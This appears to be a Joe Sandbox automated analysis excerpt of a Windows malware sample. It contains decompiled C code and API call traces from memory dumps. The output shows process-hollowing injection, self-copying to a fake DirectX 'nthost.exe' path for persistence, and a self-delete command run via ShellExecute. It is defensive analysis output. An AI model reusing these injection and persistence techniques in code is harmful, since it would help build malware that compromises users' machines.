      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
      • Part of subcall function 00417F5C: SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
      • Part of subcall function 00417F5C: ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
      • Part of subcall function 00417F5C: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
      • Part of subcall function 00417F5C: TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
      • Part of subcall function 00417F5C: CloseHandle.KERNEL32(?), ref: 004181C1
      • Part of subcall function 00417F5C: VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
      • Part of subcall function 00417F5C: TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 83%
    			E0040BC54(void* __edx) {
    				void* _t6;
    				void* _t13;
    				void* _t17;
    				void* _t20;
    				void* _t21;
    				void* _t22;
    
    				_t17 = __edx;
    				if(__edx != 0) {
    					_t22 = _t22 + 0xfffffff0;
    					_t6 = E00403404(_t6, _t21);
    				}
    				_t20 = _t6;
    				E004030E4(0);
    				 *((intOrPtr*)(_t20 + 0xc)) = 0xffff;
    				 *((intOrPtr*)(_t20 + 0x10)) = CreateEventA(0, 0xffffffff, 0xffffffff, 0);
    				 *((intOrPtr*)(_t20 + 0x14)) = CreateEventA(0, 0, 0, 0);
    				 *(_t20 + 0x18) = 0xffffffff;
    				 *((intOrPtr*)(_t20 + 0x20)) = E004030E4(1);
    				_t13 = _t20;
    				if(_t17 != 0) {
    					E0040345C(_t13);
    					_pop( *[fs:0x0]);
    				}
    				return _t20;
    			}

    APIs
    • CreateEventA.KERNEL32(00000000,000000FF,000000FF,00000000,?,?,004169E5,00000000,00416A39), ref: 0040BC7E
    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,000000FF,000000FF,00000000,?,?,004169E5,00000000,00416A39), ref: 0040BC8E
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E004179B4(void* __eax) {
    				void* _t3;
    
    				L0040C518();
    				if(__eax != 0) {
    					_t3 = E0040A56C("WSACleanup", 1);
    					E0040386C();
    					return _t3;
    				}
    				return __eax;
    			}

    APIs
    • WSACleanup.WSOCK32(00417A06,00000000,00417A14), ref: 004179B4
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 78%
    			E0040F0A8(signed int __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
    				void* _v8;
    				char _v264;
    				char _v520;
    				char _v524;
    				signed char _t47;
    				intOrPtr* _t59;
    				intOrPtr _t61;
    				intOrPtr* _t75;
    				void* _t78;
    
    				_v524 = 0;
    				_t75 = __edx;
    				_t47 = __eax;
    				_push(_t78);
    				_push(0x40f1ce);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t78 + 0xfffffdf8;
    				_t73 = __eax & 0x00000fff;
    				if((__eax & 0x00000fff) > 0x14) {
    					if(__eax != 0x100) {
    						if(__eax != 0x101) {
    							if(E0040F504(__eax,  &_v8) == 0) {
    								E00407110( &_v524, 4);
    								_t59 =  *0x4530ec; // 0x419128
    								E00404194(_t75, _v524,  *_t59);
    							} else {
    								E00403064( *_v8,  &_v520);
    								E004027B4( &_v520, 0x7fffffff, 2,  &_v264);
    								E004040EC(__edx,  &_v264);
    							}
    						} else {
    							E00403EDC(__edx, 0x40f1f4);
    						}
    					} else {
    						E00403EDC(__edx, "String");
    					}
    				} else {
    					E00403EDC(__edx,  *((intOrPtr*)(0x419358 + (_t73 & 0x0000ffff) * 4)));
    				}
    				if((_t47 & 0x00000020) != 0) {
    					E00404194(_t75,  *_t75, "Array ");
    				}
    				if((_t47 & 0x00000040) != 0) {
    					E00404194(_t75,  *_t75, "ByRef ");
    				}
    				_pop(_t61);
    				 *[fs:eax] = _t61;
    				_push(E0040F1D5);
    				return E00403E88( &_v524);
    			}

    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 82%
    			E0041381C(intOrPtr __eax, void* __ebx, char* __edx, void* __edi, void* __esi) {
    				intOrPtr _v8;
    				char _v12;
    				char* _t15;
    				char* _t23;
    				intOrPtr _t30;
    				char _t31;
    				intOrPtr _t39;
    				intOrPtr _t42;
    				void* _t45;
    
    				_v12 = 0;
    				_t23 = __edx;
    				_push(_t45);
    				_push(0x4138c2);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t45 + 0xfffffff8;
    				_v8 = 0;
    				if(__edx != 0) {
    					_t39 = __eax;
    					while( *_t23 != 0) {
    						_t15 = _t23;
    						while(1) {
    							_t31 =  *_t23;
    							if(_t31 == 0 || _t31 + 0xd3 - 2 < 0) {
    								break;
    							}
    							_t23 = _t23 + 1;
    						}
    						E00403F78( &_v12, _t23 - _t15, _t15);
    						_t42 = E004165D4(_t39, _t23 - _t15, _v12);
    						if(_t42 == 0 && E00406E50(_v12, 0x4138dc) != 0) {
    							_t42 = _t39;
    						}
    						if(_t42 != 0) {
    							if( *_t23 == 0x2e) {
    								_t23 = _t23 + 1;
    							}
    							if( *_t23 == 0x2d) {
    								_t23 = _t23 + 1;
    							}
    							if( *_t23 == 0x3e) {
    								_t23 = _t23 + 1;
    							}
    							_t39 = _t42;
    							continue;
    						}
    						goto L19;
    					}
    					_v8 = _t39;
    				}
    				L19:
    				_pop(_t30);
    				 *[fs:eax] = _t30;
    				_push(E004138C9);
    				return E00403E88( &_v12);
    			}

    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 96%
    			E0041498C(void* __eax, void* __ecx, void* __edx) {
    				signed int _t7;
    				void* _t8;
    				void* _t17;
    				void* _t29;
    
    				_push(__ecx);
    				_t29 = __edx;
    				_t17 = __eax;
    				_t7 = E004155CC(__ecx) & 0x0000007f;
    				if(_t7 > 0xd) {
    					L7:
    					_t8 = E00413A2C();
    				} else {
    					_t1 = _t7 + E004149B3; // 0x5
    					switch( *((intOrPtr*)( *_t1 * 4 +  &M004149C1))) {
    						case 0:
    							goto L7;
    						case 1:
    							E00413F54(_t17, 1, _t30);
    							E00403F78(_t29,  *_t30, 0);
    							_t8 = E00413F54(_t17,  *_t30, E004043A0(_t29));
    							goto L8;
    						case 2:
    							__eax = __esi;
    							__edx = 0x414a58;
    							__eax = E00403EDC(__esi, 0x414a58);
    							goto L8;
    						case 3:
    							__eax = __esi;
    							__edx = 0x414a68;
    							__eax = E00403EDC(__esi, 0x414a68);
    							goto L8;
    						case 4:
    							__eax = __esi;
    							__edx = 0x414a78;
    							__eax = E00403EDC(__esi, 0x414a78);
    							goto L8;
    						case 5:
    							__eax = __esi;
    							__edx = 0x414a84;
    							__eax = E00403EDC(__esi, 0x414a84);
    							goto L8;
    					}
    				}
    				L8:
    				return _t8;
    			}

    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040AC28() {
    				intOrPtr* _t5;
    				intOrPtr* _t6;
    				intOrPtr* _t7;
    				intOrPtr* _t8;
    				intOrPtr* _t9;
    				intOrPtr _t12;
    				intOrPtr _t13;
    				intOrPtr _t16;
    				intOrPtr* _t17;
    				intOrPtr* _t18;
    
    				_t12 =  *0x452f70; // 0x405e70
    				 *0x45478c = E0040A628(_t12, 1);
    				_t13 =  *0x453040; // 0x405ef0
    				 *0x454790 = E0040A628(_t13, 1);
    				_t5 =  *0x452f34; // 0x454008
    				 *_t5 = 0x40a7a4;
    				_t6 =  *0x452fa8; // 0x454004
    				 *_t6 = E0040AC18;
    				_t7 =  *0x452f64; // 0x45401c
    				_t16 =  *0x406188; // 0x4061d4
    				 *_t7 = _t16;
    				_t8 =  *0x452f98; // 0x45400c
    				 *_t8 = E0040A968;
    				_t9 =  *0x452fac; // 0x454010
    				 *_t9 = E0040AB4C;
    				_t17 =  *0x453054; // 0x454020
    				 *_t17 = E0040A8B4;
    				_t18 =  *0x452f24; // 0x454028
    				 *_t18 = E0040A8D0;
    				return E0040A8D0;
    			}

    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd

    Executed Functions

    APIs
    • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 0020E0C6
    • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0020E0DC
    • CreateProcessA.KERNEL32(?,00000000), ref: 0020E1C2
    • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0020E1F0
    • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 0020E235
    • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 0020E271
    • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0020E297
    • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 0020E306
    • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 0020E32C
    • SetThreadContext.KERNEL32(00000000,?), ref: 0020E34E
    • ResumeThread.KERNELBASE(00000000), ref: 0020E35A
    Memory Dump Source
    • Source File: 00000017.00000002.1576107287.0020D000.00000040.sdmp, Offset: 0020D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_20d000_obtG43AWHP.jbxd
    APIs
    • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 0020E493
    • PostMessageA.USER32(00000000,00000400,00000064,000001F4), ref: 0020E4B6
      • Part of subcall function 0020E080: VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 0020E0C6
      • Part of subcall function 0020E080: GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0020E0DC
      • Part of subcall function 0020E080: CreateProcessA.KERNEL32(?,00000000), ref: 0020E1C2
      • Part of subcall function 0020E080: VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0020E1F0
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.1576107287.0020D000.00000040.sdmp, Offset: 0020D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_20d000_obtG43AWHP.jbxd
    APIs
    • GetFileAttributesA.KERNELBASE(apfHQ), ref: 0020E54C
      • Part of subcall function 0020E380: CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 0020E493
      • Part of subcall function 0020E380: PostMessageA.USER32(00000000,00000400,00000064,000001F4), ref: 0020E4B6
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.1576107287.0020D000.00000040.sdmp, Offset: 0020D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_20d000_obtG43AWHP.jbxd

    Non-executed Functions

    Memory Dump Source
    • Source File: 00000017.00000002.1576107287.0020D000.00000040.sdmp, Offset: 0020D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_20d000_obtG43AWHP.jbxd

    Executed Functions

    C-Code - Quality: 65%
    			E00404FC0(intOrPtr __eax) {
    				intOrPtr _v8;
    				void* _v12;
    				char _v15;
    				char _v17;
    				char _v18;
    				char _v22;
    				int _v28;
    				char _v289;
    				long _t44;
    				long _t61;
    				long _t63;
    				CHAR* _t70;
    				CHAR* _t72;
    				struct HINSTANCE__* _t78;
    				struct HINSTANCE__* _t84;
    				char* _t94;
    				void* _t95;
    				intOrPtr _t99;
    				struct HINSTANCE__* _t107;
    				void* _t110;
    				void* _t112;
    				intOrPtr _t113;
    
    				_t110 = _t112;
    				_t113 = _t112 + 0xfffffee0;
    				_v8 = __eax;
    				GetModuleFileNameA(0,  &_v289, 0x105);
    				_v22 = 0;
    				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
    				if(_t44 == 0) {
    					L3:
    					_push(_t110);
    					_push(0x4050c5);
    					_push( *[fs:eax]);
    					 *[fs:eax] = _t113;
    					_v28 = 5;
    					E00404E08( &_v289, 0x105);
    					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E0040522C, 0, 0,  &_v22,  &_v28) != 0) {
    						_v22 = 0;
    					}
    					_v18 = 0;
    					_pop(_t99);
    					 *[fs:eax] = _t99;
    					_push(E004050CC);
    					return RegCloseKey(_v12);
    				} else {
    					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
    					if(_t61 == 0) {
    						goto L3;
    					} else {
    						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
    						if(_t63 != 0) {
    							_push(0x105);
    							_push(_v8);
    							_push( &_v289);
    							L00401248();
    							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
    							_t107 = 0;
    							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
    								_t70 =  &_v289;
    								_push(_t70);
    								L00401250();
    								_t94 = _t70 +  &_v289;
    								while( *_t94 != 0x2e && _t94 !=  &_v289) {
    									_t94 = _t94 - 1;
    								}
    								_t72 =  &_v289;
    								if(_t94 != _t72) {
    									_t95 = _t94 + 1;
    									if(_v22 != 0) {
    										_push(0x105 - _t95 - _t72);
    										_push( &_v22);
    										_push(_t95);
    										L00401248();
    										_t107 = LoadLibraryExA( &_v289, 0, 2);
    									}
    									if(_t107 == 0 && _v17 != 0) {
    										_push(0x105 - _t95 -  &_v289);
    										_push( &_v17);
    										_push(_t95);
    										L00401248();
    										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
    										_t107 = _t78;
    										if(_t107 == 0) {
    											_v15 = 0;
    											_push(0x105 - _t95 -  &_v289);
    											_push( &_v17);
    											_push(_t95);
    											L00401248();
    											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
    											_t107 = _t84;
    										}
    									}
    								}
    							}
    							return _t107;
    						} else {
    							goto L3;
    						}
    					}
    				}
    			}

    APIs
    • GetModuleFileNameA.KERNEL32(00000000,?,00000105,0000000B,00000000), ref: 00404FDC
    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00404FFA
    • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00405018
    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405036
      • Part of subcall function 00404E08: GetModuleHandleA.KERNEL32(kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00404E25
      • Part of subcall function 00404E08: GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00404E36
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,?,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00404E66
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00404ECA
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001), ref: 00404EFF
      • Part of subcall function 00404E08: FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5), ref: 00404F12
      • Part of subcall function 00404E08: FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000), ref: 00404F1F
      • Part of subcall function 00404E08: lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068), ref: 00404F2B
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B), ref: 00404F5F
      • Part of subcall function 00404E08: lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8), ref: 00404F6B
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00404F8D
    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040507F
    • RegQueryValueExA.ADVAPI32(?,0040522C,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001), ref: 0040509D
    • RegCloseKey.ADVAPI32(?,004050CC,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004050BF
    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
    • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Strings
    Memory Dump Source
    • Source File: 00000018.00000002.1577217534.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_24_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 61%
    			E004050CC() {
    				void* _t28;
    				void* _t30;
    				struct HINSTANCE__* _t36;
    				struct HINSTANCE__* _t42;
    				char* _t51;
    				void* _t52;
    				struct HINSTANCE__* _t59;
    				void* _t61;
    
    				_push(0x105);
    				_push( *((intOrPtr*)(_t61 - 4)));
    				_push(_t61 - 0x11d);
    				L00401248();
    				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
    				_t59 = 0;
    				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
    					L14:
    					return _t59;
    				} else {
    					_t28 = _t61 - 0x11d;
    					_push(_t28);
    					L00401250();
    					_t51 = _t28 + _t61 - 0x11d;
    					L5:
    					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
    						_t51 = _t51 - 1;
    						goto L5;
    					}
    					_t30 = _t61 - 0x11d;
    					if(_t51 != _t30) {
    						_t52 = _t51 + 1;
    						if( *((char*)(_t61 - 0x12)) != 0) {
    							_push(0x105 - _t52 - _t30);
    							_push(_t61 - 0x12);
    							_push(_t52);
    							L00401248();
    							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
    						}
    						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
    							_push(0x105 - _t52 - _t61 - 0x11d);
    							_push(_t61 - 0xd);
    							_push(_t52);
    							L00401248();
    							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
    							_t59 = _t36;
    							if(_t59 == 0) {
    								 *((char*)(_t61 - 0xb)) = 0;
    								_push(0x105 - _t52 - _t61 - 0x11d);
    								_push(_t61 - 0xd);
    								_push(_t52);
    								L00401248();
    								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
    								_t59 = _t42;
    							}
    						}
    					}
    					goto L14;
    				}
    			}












    APIs
    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
    • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Strings
    Memory Dump Source
    • Source File: 00000018.00000002.1577217534.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_24_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 33%
    			E00418750(void* __ebx, void* __edi, void* __esi) {
    				char _v8;
    				char _v12;
    				char _v16;
    				char _v20;
    				char _v24;
    				char _v28;
    				char _v32;
    				char _v36;
    				char _v40;
    				char _v44;
    				intOrPtr _v48;
    				char _v52;
    				int _v56;
    				char _v60;
    				char _v64;
    				char _v68;
    				char _v72;
    				char* _t52;
    				void* _t80;
    				char* _t87;
    				char* _t99;
    				void* _t109;
    				void* _t110;
    				intOrPtr _t116;
    				intOrPtr _t117;
    				void* _t125;
    				intOrPtr _t139;
    				intOrPtr _t140;
    
    				_t137 = __esi;
    				_t136 = __edi;
    				_t139 = _t140;
    				_t110 = 8;
    				do {
    					_push(0);
    					_push(0);
    					_t110 = _t110 - 1;
    				} while (_t110 != 0);
    				_push(_t110);
    				_push(__ebx);
    				_push(__esi);
    				_push(__edi);
    				_push(_t139);
    				_push(0x418974);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t140;
    				if(E00402944(__ebx, __esi) == 0) {
    					E004029A4(0,  &_v12);
    					ShellExecuteA(0, 0, E00404348(_v12), 0x418984, 0, 0);
    					E00403D1C();
    				}
    				_push(_t139);
    				_push(0x418925);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t140;
    				E004029A4(1,  &_v16);
    				_t109 = E00407138(_v16, 0);
    				_t144 = _t109 - 0x10;
    				if(_t109 == 0x10) {
    					E00417D84("%appdata%\\Microsoft\\DirectX\\nthost.exe", _t109, _t110,  &_v8, _t136, _t137, _t144);
    					E004186D0(_v8, _t109, _t110, _t144);
    					E00406EFC("%appdata%\\Microsoft\\DirectX\\nthost.exe",  &_v24);
    					E00417D84(_v24, _t109, _t110,  &_v20, _t136, _t137, _t144);
    					_push(_v20);
    					E00406EFC("DX9 C++RTL",  &_v28);
    					_pop(_t125);
    					E004185E8(_v28, _t109, _t125);
    					E004029A4(0,  &_v36);
    					E00406EFC(_v36,  &_v32);
    					_push(_v32);
    					E00406EFC("%appdata%\\Microsoft\\DirectX\\nthost.exe",  &_v44);
    					E00417D84(_v44, _t109, _t110,  &_v40, _t136, _t137, 0);
    					_pop(_t80);
    					E00404294(_t80, _v40);
    					if(0 == 0) {
    						__eflags = 1;
    						E00406FFC( &_v60);
    						_t87 = E00404348(_v60);
    						ShellExecuteA(0, 0, E00404348(_v8), _t87, 0, 1);
    					} else {
    						_push(1);
    						_push(0);
    						E00406FFC( &_v52);
    						_push(_v52);
    						_push(" DEL \"");
    						E004029A4(0,  &_v56);
    						E00404208();
    						_t99 = E00404348(_v48);
    						ShellExecuteA(0, 0, E00404348(_v8), _t99, E004189E4, _v56);
    					}
    					E00403D1C();
    				}
    				if(_t109 < 0x20) {
    					E00406FFC( &_v64);
    					_t52 = E00404348(_v64);
    					E004029A4(0,  &_v68);
    					ShellExecuteA(0, 0, E00404348(_v68), _t52, 0, 1); // executed
    					E00403D1C();
    				}
    				_pop(_t116);
    				 *[fs:eax] = _t116;
    				_pop(_t117);
    				 *[fs:eax] = _t117;
    				_push(E0041897B);
    				return E00403EAC( &_v72, 0x11);
    			}
































    APIs
      • Part of subcall function 00402944: GetCommandLineA.KERNEL32(00000000,00402995,?,?,?,00000000,?,00418CB4,00000000,00418D4A,?,00000000,00418D7B), ref: 0040295B
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00418984,00000000,00000000), ref: 0041879A
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,004189E4,00000000), ref: 004188A3
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 004188D1
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00418911
      • Part of subcall function 00403D1C: FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
      • Part of subcall function 00403D1C: ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
